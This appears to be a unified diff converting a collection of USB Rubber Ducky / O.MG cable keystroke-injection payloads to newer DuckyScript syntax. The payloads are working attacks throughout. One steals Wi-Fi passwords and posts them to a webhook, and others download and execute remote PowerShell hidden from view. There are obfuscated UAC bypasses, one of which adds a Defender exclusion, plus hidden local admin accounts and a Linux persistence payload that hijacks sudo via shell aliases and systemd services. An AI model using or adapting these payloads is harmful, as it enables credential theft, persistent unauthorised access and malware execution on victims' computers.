STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [enabling services]
|
REM [enabling services]
|
||||||
STRING systemctl --user daemon-reload
|
STRINGLN systemctl --user daemon-reload
|
||||||
ENTER
|
STRINGLN systemctl --user enable --now systemBUS.service
|
||||||
DELAY 300
|
STRINGLN systemctl --user start --now systemBUS.service
|
||||||
STRING systemctl --user enable --now systemBUS.service
|
STRINGLN systemctl --user enable --now reboot.service
|
||||||
ENTER
|
STRINGLN systemctl --user start --now reboot.service
|
||||||
DELAY 150
|
|
||||||
STRING systemctl --user start --now systemBUS.service
|
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
STRING systemctl --user enable --now reboot.service
|
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
STRING systemctl --user start --now reboot.service
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [autostarting service on terminal/shell launch]
|
REM [autostarting service on terminal/shell launch]
|
||||||
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
STRINGLN echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||||
ENTER
|
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||||
DELAY 100
|
|
||||||
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
|
||||||
ENTER
|
|
|
@ -1,27 +1,24 @@
|
||||||
REM I took my own code and found the other version already made. I combined them to make it better
|
REM_BLOCK
|
||||||
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
|
DESCRIPTION:
|
||||||
REM this is designed for the omg cable instead of the tiny.
|
I took my own code and found the other version already made. I combined them to make it better.
|
||||||
|
This is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
|
||||||
|
|
||||||
|
This is designed for the omg cable instead of the tiny.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #WEBHOOKADDR <ADD-WEBHOOK-ADDRESS-HERE>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
|
|
||||||
Delay 3000
|
|
||||||
STRING GUI r
|
STRING GUI r
|
||||||
Delay 100
|
STRINGLN cmd /k mode con: cols=15 lines=1
|
||||||
String cmd /k mode con: cols=15 lines=1
|
STRINGLN cd %temp%
|
||||||
Enter
|
STRINGLN netsh wlan export profile key=clear
|
||||||
Delay 500
|
STRINGLN powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
|
||||||
String cd %temp%
|
DELAY 3000
|
||||||
Enter
|
STRINGLN powershell Invoke-WebRequest -Uri https://webhook.site/#WEBHOOKADDR -Method POST -InFile Wi-Fi-PASS
|
||||||
Delay 500
|
|
||||||
String netsh wlan export profile key=clear
|
|
||||||
Enter
|
|
||||||
Delay 1000
|
|
||||||
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
|
|
||||||
Enter
|
|
||||||
Delay 3000
|
Delay 3000
|
||||||
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS
|
STRINGLN del Wi* /s /f /q
|
||||||
Enter
|
STRINGLN exit
|
||||||
Delay 3000
|
|
||||||
String del Wi* /s /f /q
|
|
||||||
Enter
|
|
||||||
Delay 1000
|
|
||||||
Exit
|
|
|
@ -1,16 +0,0 @@
|
||||||
REM Title: Play-WAV
|
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
|
||||||
|
|
||||||
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
|
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
|
||||||
|
|
||||||
REM Remeber to replace the link with your link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
|
||||||
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
REM_BLOCK
|
||||||
|
Title: Play-WAV
|
||||||
|
Author: I am Jakoby
|
||||||
|
Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more
|
||||||
|
|
||||||
|
Target: Windows 10, 11
|
||||||
|
|
||||||
|
Remeber to replace the link with your link for the intended file to download
|
||||||
|
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -Exec Bypass iwr https://#URL?dl=1 -O $env:TMP\e.wav
|
|
@ -1,25 +1,20 @@
|
||||||
REM Title: Safe-Haven
|
REM_BLOCK
|
||||||
|
Title: Safe-Haven
|
||||||
|
Author: I am Jakoby
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
Description: This is a UAC bypass payload that will open an elevated powershell console
|
||||||
|
Next a Directory called "safe" will be generated in your Documents Directory
|
||||||
|
The "safe" directory will be added to the Window's Defender Exclusion list
|
||||||
|
The AntiVirus will ignore all files downloaded to or ran from here
|
||||||
|
|
||||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console
|
Target: Windows 10, 11
|
||||||
REM Next a Directory called "safe" will be generated in your Documents Directory
|
END_REM
|
||||||
REM The "safe" directory will be added to the Window's Defender Exclusion list
|
|
||||||
REM The AntiVirus will ignore all files downloaded to or ran from here
|
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
DELAY 500
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
STRINGLN & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
|
||||||
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
|
|
||||||
ENTER
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,15 +1,20 @@
|
||||||
REM Title: Shortcut-Jacker
|
REM_BLOCK
|
||||||
|
Title: Shortcut-Jacker
|
||||||
|
Author: I am Jakoby
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
||||||
|
|
||||||
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
Target: Windows 10, 11
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #URL <Your Shared link for the intended file>
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <Your Shared link for the intended file>?dl=1; invoke-expression $pl
|
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #URL?dl=1; invoke-expression $pl
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
|
|
@ -1,30 +1,31 @@
|
||||||
REM Title: UrAttaControl
|
REM_BLOCK
|
||||||
|
Title: UrAttaControl
|
||||||
|
Author: I am Jakoby
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
|
||||||
|
Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
|
||||||
|
|
||||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
|
Target: Windows 10, 11
|
||||||
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
|
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
|
||||||
|
EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
|
||||||
|
|
||||||
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
|
You can use this function I wrote to convert your .ps1 sscripts to Base64
|
||||||
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
|
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM You can use this function I wrote to convert your .ps1 sscripts to Base64
|
DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
|
||||||
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
|
STRINGLN $url = #URL
|
||||||
SHIFT ENTER
|
STRINGLN $Payload = (Invoke-WebRequest $url'?dl=1').Content
|
||||||
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
|
STRINGLN ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
|
||||||
SHIFT ENTER
|
STRINGLN exit
|
||||||
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
|
|
||||||
SHIFT ENTER
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
|
@ -1,71 +1,36 @@
|
||||||
REM Title: Add_Local_Admin
|
REM_BLOCK
|
||||||
REM Author: LulzAnarchyAnon
|
Title: Add_Local_Admin
|
||||||
REM Description: Administrator PowerShell is opened, and a script
|
Author: LulzAnarchyAnon
|
||||||
REM runs that adds a Local Admin User.
|
Description: Administrator PowerShell is opened, and a script runs that adds a Local Admin User.
|
||||||
REM Target: Windows 10 PowerShell
|
Target: Windows 10 PowerShell
|
||||||
REM Props: Darren Kitchen, and I am Jakoby
|
Props: Darren Kitchen, and I am Jakoby
|
||||||
REM Version: 1.0
|
Version: 1.0
|
||||||
REM Category: Execution
|
Category: Execution
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
|
|
||||||
GUI x
|
GUI x
|
||||||
DELAY 500
|
STRING a
|
||||||
a
|
|
||||||
DELAY 500
|
|
||||||
ALT y
|
ALT y
|
||||||
Delay 2000
|
|
||||||
|
|
||||||
STRING $Username = "Admin2"
|
STRINGLN $Username = "Admin2"
|
||||||
DELAY 2000
|
STRINGLN $Password = "password"
|
||||||
ENTER
|
STRINGLN $group = "Administrators"
|
||||||
STRING $Password = "password"
|
STRINGLN $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
||||||
DELAY 2000
|
STRINGLN $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
|
||||||
ENTER
|
STRINGLN if ($existing -eq $null) {
|
||||||
STRING $group = "Administrators"
|
STRINGLN Write-Host "Creating new local user $Username."
|
||||||
DELAY 2000
|
STRINGLN & NET USER $Username $Password /add /y /expires:never
|
||||||
ENTER
|
STRINGLN Write-Host "Adding local user $Username to $group."
|
||||||
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
STRINGLN & NET LOCALGROUP $group $Username /add
|
||||||
DELAY 5000
|
STRINGLN }
|
||||||
ENTER
|
STRINGLN {
|
||||||
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
|
STRINGLN Write-Host "Setting password for existing local user $Username."
|
||||||
DELAY 5000
|
STRINGLN $existing.SetPassword($Password)
|
||||||
ENTER
|
STRINGLN }
|
||||||
STRING if ($existing -eq $null) {
|
STRINGLN Write-Host "Ensuring password for $Username never expires."
|
||||||
DELAY 2000
|
STRINGLN & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
|
||||||
ENTER
|
STRINGLN exit
|
||||||
STRING Write-Host "Creating new local user $Username."
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING & NET USER $Username $Password /add /y /expires:never
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Adding local user $Username to $group."
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING & NET LOCALGROUP $group $Username /add
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING }
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING {
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Setting password for existing local user $Username."
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING $existing.SetPassword($Password)
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING }
|
|
||||||
DELAY 2000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Ensuring password for $Username never expires."
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
STRING exit
|
|
||||||
DELAY 100
|
|
||||||
ENTER
|
|
|
@ -1,10 +1,14 @@
|
||||||
REM Title: Admin who never sleeps
|
REM_BLOCK
|
||||||
REM Desc: Adds a local hidden admin user and sets power settings to never sleep.
|
Title: Admin who never sleeps
|
||||||
REM Author: UberGuidoZ
|
Desc: Adds a local hidden admin user and sets power settings to never sleep.
|
||||||
REM Target: Windows (local admin required)
|
Author: UberGuidoZ
|
||||||
|
Target: Windows (local admin required)
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
REM Launch admin-level CMD prompt
|
REM Launch admin-level CMD prompt
|
||||||
DELAY 3000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING cmd
|
STRING cmd
|
||||||
|
@ -17,31 +21,25 @@ ENTER
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
|
|
||||||
REM Create local admin user WinSystem with pass Some-P@ssw0rd
|
REM Create local admin user WinSystem with pass Some-P@ssw0rd
|
||||||
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
|
STRINGLN net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
|
||||||
ENTER
|
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
|
|
||||||
REM Set WinSystem user pass to never expire, skip UAC, and hide the user
|
REM Set WinSystem user pass to never expire, skip UAC, and hide the user
|
||||||
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
|
STRINGLN wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
|
||||||
ENTER
|
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
|
|
||||||
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
|
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
|
||||||
|
|
||||||
STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
|
STRINGLN powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
|
STRINGLN Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
|
STRINGLN powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Set monitor timeouts to avoid noticing system is awake
|
REM Set monitor timeouts to avoid noticing system is awake
|
||||||
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
|
STRINGLN powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Exit and enjoy your user whenever!
|
REM Exit and enjoy your user whenever!
|
||||||
EXIT
|
STRINGLN exit
|
|
@ -1,41 +0,0 @@
|
||||||
REM Ai-Cable
|
|
||||||
REM Version 2.0
|
|
||||||
REM OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
|
|
||||||
REM Author: 0iphor13
|
|
||||||
|
|
||||||
REM This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
|
|
||||||
REM Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
|
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
|
|
||||||
REM Language only needed if you are not using an US layout
|
|
||||||
DUCKY_LANG de
|
|
||||||
|
|
||||||
MOUSE MOVE -10000 -10000
|
|
||||||
DELAY 200
|
|
||||||
MOUSE MOVE 200 200
|
|
||||||
DELAY 200
|
|
||||||
MOUSE CLICK 1
|
|
||||||
DELAY 200
|
|
||||||
CTRL a
|
|
||||||
DELAY 200
|
|
||||||
CTRL x
|
|
||||||
DELAY 200
|
|
||||||
STRING I will create the payload for you :)
|
|
||||||
DELAY 3000
|
|
||||||
CTRL a
|
|
||||||
DELAY 200
|
|
||||||
CTRL v
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
MOUSE MOVE -10000 -10000
|
|
||||||
DELAY 200
|
|
||||||
MOUSE MOVE 200 200
|
|
||||||
DELAY 200
|
|
||||||
ENTER
|
|
||||||
MOUSE CLICK 1
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
REM_BLOCK
|
||||||
|
Ai-Cable
|
||||||
|
Version 2.0
|
||||||
|
OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
|
||||||
|
Author: 0iphor13
|
||||||
|
|
||||||
|
This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
|
||||||
|
Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG de
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 200
|
||||||
|
|
||||||
|
MOUSE MOVE -10000 -10000
|
||||||
|
MOUSE MOVE 200 200
|
||||||
|
MOUSE CLICK 1
|
||||||
|
CTRL a
|
||||||
|
CTRL x
|
||||||
|
STRING I will create the payload for you :)
|
||||||
|
DELAY 3000
|
||||||
|
CTRL a
|
||||||
|
CTRL v
|
||||||
|
DELAY 1000
|
||||||
|
REPEAT 3 TAB
|
||||||
|
MOUSE MOVE -10000 -10000
|
||||||
|
MOUSE MOVE 200 200
|
||||||
|
ENTER
|
||||||
|
MOUSE CLICK 1
|
|
@ -1,133 +1,62 @@
|
||||||
|
REM_BLOCK
|
||||||
|
Title: Blue_Harvester
|
||||||
|
Author: LulzAnarchyAnon
|
||||||
|
|
||||||
REM Title: Blue_Harvester
|
READ BELOW BEFORE EXECUTING PAYLOAD...
|
||||||
|
|
||||||
REM Author: LulzAnarchyAnon
|
Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
|
||||||
|
Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened is selected followed by all of the files in the folder being selected, and added to the transfer cue.
|
||||||
|
The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
|
||||||
|
Afterwards the selected files are transfered to the attackers device via bluetooth.
|
||||||
|
I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
|
||||||
|
Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
|
||||||
|
At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
|
||||||
|
NOTE: Make sure your device is Discoverable...
|
||||||
|
The cursor coordinates x,y on the screen may vary depending on device...
|
||||||
|
A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
|
||||||
|
|
||||||
|
I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or USB Rubber Ducky (YOUR CHOICE)
|
||||||
|
|
||||||
|
Target: Windows 10
|
||||||
|
Props: Darren Kitchen and I am Jakoby
|
||||||
|
Version: 1.0
|
||||||
|
Category: Execution
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
REM READ BELOW BEFORE EXECUTING PAYLOAD...
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
|
|
||||||
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
|
|
||||||
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
|
|
||||||
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
|
|
||||||
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
|
|
||||||
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
|
|
||||||
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
|
|
||||||
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
|
|
||||||
REM NOTE: Make sure your device is Discoverable...
|
|
||||||
REM The cursor coordinates x,y on the screen may vary depending on device...
|
|
||||||
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
|
|
||||||
|
|
||||||
|
|
||||||
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
|
|
||||||
REM USB Rubber Ducky (YOUR CHOICE)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
REM Target: Windows 10
|
|
||||||
|
|
||||||
REM Props: Darren Kitchen and I am Jakoby
|
|
||||||
|
|
||||||
REM Version: 1.0
|
|
||||||
|
|
